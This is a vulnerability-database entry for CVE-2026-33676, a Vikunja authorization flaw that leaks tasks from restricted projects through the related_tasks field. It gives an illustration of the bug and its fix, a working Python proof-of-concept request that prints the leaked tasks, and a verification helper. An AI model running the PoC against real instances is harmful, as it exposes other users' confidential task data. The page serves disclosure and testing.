Security Vulnerability Report
CVE-2026-33676 CVSS 6.5 MEDIUM

Published: 2026-03-24 16:16:35
Last Modified: 2026-03-27 16:12:27

Description

Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.1, when the Vikunja API returns tasks, it populates the `related_tasks` field with full task objects for all related tasks without checking whether the requesting user has read permission on those tasks' projects. An authenticated user who can read a task that has cross-project relations will receive full details (title, description, due dates, priority, percent completion, project ID, etc.) of tasks in projects they have no access to. Version 2.2.1 patches the issue.
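The defect is a missing authorization check on the expanded objects (CWE-863), not on the requested task itself. The following is an added illustration of that pattern and of the class of fix, written for this page; it is not Vikunja's code and is not the content of the linked patch commit. The task records, project memberships and relation map are constructed stand-ins; the shape of `related_tasks` (relation kind mapped to a list of task objects) is an assumption matching what the PoC below parses.

```python
"""Added illustration of the CWE-863 defect behind CVE-2026-33676 and its fix.

Not Vikunja's code. Tasks, project membership and the relation map are
simplified stand-ins constructed here; `related_tasks` is modelled as a
mapping of relation kind -> list of task objects (an assumption).
"""
from dataclasses import dataclass, asdict


@dataclass
class Task:
    id: int
    title: str
    description: str
    project_id: int
    due_date: str = ""
    priority: int = 0
    percent_done: float = 0.0


# Constructed sample data: the requester "alice" is a member of project 1 only.
TASKS = {
    1: Task(1, "Roadmap", "Visible to project 1 members", project_id=1),
    2: Task(2, "Salary review", "Confidential HR task", project_id=2,
            due_date="2026-04-01T00:00:00Z", priority=5, percent_done=0.5),
    3: Task(3, "Write release notes", "Also in project 1", project_id=1),
}
# Relations of each task, keyed by relation kind -> related task IDs.
RELATIONS = {1: {"related": [2], "subtask": [3]}}
PROJECT_MEMBERS = {1: {"alice"}, 2: {"bob"}}


def can_read_project(user: str, project_id: int) -> bool:
    """Stand-in for the project read-permission check."""
    return user in PROJECT_MEMBERS.get(project_id, set())


def _expand(task_id: int, user: str, check_related: bool) -> dict:
    task = TASKS[task_id]
    # Both versions authorise the *requested* task against its own project.
    if not can_read_project(user, task.project_id):
        raise PermissionError(f"{user} may not read task {task_id}")
    related = {}
    for kind, ids in RELATIONS.get(task_id, {}).items():
        visible = [
            asdict(TASKS[i]) for i in ids
            # The fix: each related task must pass the same check for its project.
            if not check_related or can_read_project(user, TASKS[i].project_id)
        ]
        if visible:
            related[kind] = visible
    return {**asdict(task), "related_tasks": related}


def get_task_vulnerable(task_id: int, user: str) -> dict:
    """Pre-2.2.1 behaviour: every related task is expanded into a full object."""
    return _expand(task_id, user, check_related=False)


def get_task_fixed(task_id: int, user: str) -> dict:
    """Related tasks are filtered by the requester's read permission on their project."""
    return _expand(task_id, user, check_related=True)


if __name__ == "__main__":
    leaked = get_task_vulnerable(1, "alice")["related_tasks"]
    print("vulnerable:", {k: [t["id"] for t in v] for k, v in leaked.items()})
    safe = get_task_fixed(1, "alice")["related_tasks"]
    print("fixed:     ", {k: [t["id"] for t in v] for k, v in safe.items()})
```

With this data, the vulnerable expansion hands "alice" the full record of task 2 (project 2, which she cannot read), while the fixed expansion drops the `related` group entirely and keeps only the in-project subtask. Note that the check is per related task, not per requested task: a user can be legitimately allowed to read the task they asked for while still being denied its neighbours.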

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:* - VULNERABLE
Vikunja < 2.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Exploit Title: Vikunja < 2.2.1 - Information Disclosure via Related Tasks
# Description: Retrieve details of tasks in restricted projects via cross-project relations.

TARGET_URL = "http://localhost:3456/api/v1"
AUTH_TOKEN = "YOUR_JWT_TOKEN_HERE"  # Obtain after login

# Step 1: Fetch a task that has cross-project relations.
# The user needs read access to this specific task (its own project);
# the bug is that the related tasks are not subject to the same check.
task_id = 1
headers = {
    "Authorization": f"Bearer {AUTH_TOKEN}",
    "Content-Type": "application/json",
}

response = requests.get(f"{TARGET_URL}/tasks/{task_id}", headers=headers)

if response.status_code == 200:
    data = response.json()
    related = data.get("related_tasks")
    # Vikunja returns `related_tasks` grouped by relation kind (a mapping of
    # kind -> list of task objects); iterating the mapping directly would only
    # yield the kind names, so flatten it. A flat list is tolerated as well.
    if isinstance(related, dict):
        related_list = [t for tasks in related.values() for t in (tasks or [])]
    else:
        related_list = related or []
    if related_list:
        print("Successfully retrieved related tasks:")
        for task in related_list:
            # This task might belong to a project the user has no access to
            print(f"Task ID: {task['id']}, Title: {task['title']}, Project ID: {task.get('project_id')}")
            print(f"Description: {task.get('description')}")
    else:
        print("No related tasks found or field not populated.")
else:
    print(f"Failed to fetch task. Status: {response.status_code}")
```
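Printing the related tasks does not by itself prove a disclosure: the caller may legitimately belong to every project involved. The following is an added verification helper (not part of the page's PoC and not Vikunja code) that, for each related task in a task response, asks whether the same credentials can read that task's project directly and reports only the ones they cannot. It assumes the project endpoint is `GET {base_url}/projects/{id}` and that any status other than 200 (typically 403) means no read access; the sample response is constructed, not captured from a real instance.

```python
"""Added verification helper for CVE-2026-33676; not part of the page's PoC
or of Vikunja.

Assumptions: GET {base_url}/projects/{id} returns 200 only when the caller
has read access to that project; `related_tasks` is a mapping of relation
kind -> list of task objects (a flat list is also accepted).
"""
from __future__ import annotations

from typing import Callable, Iterator

SENSITIVE_FIELDS = ("title", "description", "due_date", "priority",
                    "percent_done", "project_id")


def iter_related_tasks(related) -> Iterator[tuple[str, dict]]:
    """Yield (relation kind, task) pairs from a `related_tasks` value."""
    if isinstance(related, dict):
        for kind, tasks in related.items():
            for task in tasks or []:
                yield kind, task
    elif isinstance(related, list):
        for task in related:
            yield "unknown", task


def find_leaked_related_tasks(task_json: dict,
                              project_readable: Callable[[int], bool]) -> list[dict]:
    """Return the related tasks whose project `project_readable` rejects,
    together with the populated sensitive fields each one exposes."""
    leaks = []
    for kind, task in iter_related_tasks(task_json.get("related_tasks")):
        project_id = task.get("project_id")
        if project_id is None:
            continue  # nothing to judge without a project reference
        if not project_readable(project_id):
            leaks.append({
                "kind": kind,
                "id": task.get("id"),
                "project_id": project_id,
                "exposed": [f for f in SENSITIVE_FIELDS
                            if task.get(f) not in (None, "", 0)],
            })
    return leaks


def check_instance(base_url: str, token: str, task_id: int) -> list[dict]:
    """Live check against a Vikunja API (network and `requests` required)."""
    import requests  # imported here so the pure functions above run offline

    session = requests.Session()
    session.headers["Authorization"] = f"Bearer {token}"
    response = session.get(f"{base_url}/tasks/{task_id}", timeout=10)
    response.raise_for_status()

    cache: dict[int, bool] = {}

    def readable(project_id: int) -> bool:
        # One direct probe per project; 200 means the caller may read it.
        if project_id not in cache:
            r = session.get(f"{base_url}/projects/{project_id}", timeout=10)
            cache[project_id] = r.status_code == 200
        return cache[project_id]

    return find_leaked_related_tasks(response.json(), readable)


# Constructed sample response (not captured from a real instance): task 1 in
# project 1 relates to task 2 in project 2 and to subtask 3 in project 1.
SAMPLE_RESPONSE = {
    "id": 1, "title": "Roadmap", "project_id": 1,
    "related_tasks": {
        "related": [{"id": 2, "title": "Salary review", "description": "Confidential",
                     "due_date": "2026-04-01T00:00:00Z", "priority": 5,
                     "percent_done": 0.5, "project_id": 2}],
        "subtask": [{"id": 3, "title": "Release notes", "description": "",
                     "priority": 0, "percent_done": 0, "project_id": 1}],
    },
}

if __name__ == "__main__":
    # Offline demonstration: the caller can read project 1 only.
    for leak in find_leaked_related_tasks(SAMPLE_RESPONSE, lambda pid: pid == 1):
        print(leak)
```

Against a live instance, `check_instance("http://localhost:3456/api/v1", token, 1)` returns an empty list on a patched server (either the cross-project tasks are absent or every listed project is readable) and one entry per leaked task on a vulnerable one. Probing each project once and caching the answer keeps the check cheap on tasks with many relations.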

References

https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8cmm-j6c4-rr8v - Vendor Advisory, Exploit
https://github.com/go-vikunja/vikunja/commit/833f2aec006ac0f6643c41872e45dd79220b9174 - Patch
https://github.com/go-vikunja/vikunja/pull/2449 - Issue Tracking
https://vikunja.io/changelog/vikunja-v2.2.2-was-released - Release Notes

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33676", "sourceIdentifier": "[email protected]", "published": "2026-03-24T16:16:34.947", "lastModified": "2026-03-27T16:12:26.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.1, when the Vikunja API returns tasks, it populates the `related_tasks` field with full task objects for all related tasks without checking whether the requesting user has read permission on those tasks' projects. An authenticated user who can read a task that has cross-project relations will receive full details (title, description, due dates, priority, percent completion, project ID, etc.) of tasks in projects they have no access to. Version 2.2.1 patches the issue."}, {"lang": "es", "value": "Vikunja es una plataforma de gestión de tareas de código abierto y autoalojada. Antes de la versión 2.2.1, cuando la API de Vikunja devuelve tareas, rellena el campo 'related_tasks' con objetos de tarea completos para todas las tareas relacionadas sin verificar si el usuario solicitante tiene permiso de lectura sobre los proyectos de esas tareas. Un usuario autenticado que puede leer una tarea que tiene relaciones entre proyectos recibirá detalles completos (título, descripción, fechas de vencimiento, prioridad, porcentaje de finalización, ID de proyecto, etc.) de tareas en proyectos a los que no tiene acceso. La versión 2.2.1 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.1", "matchCriteriaId": "E8647862-9C78-473D-9FED-7AFC24335A61"}]}]}], "references": [{"url": "https://github.com/go-vikunja/vikunja/commit/833f2aec006ac0f6643c41872e45dd79220b9174", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/go-vikunja/vikunja/pull/2449", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8cmm-j6c4-rr8v", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://vikunja.io/changelog/vikunja-v2.2.2-was-released", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8cmm-j6c4-rr8v", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}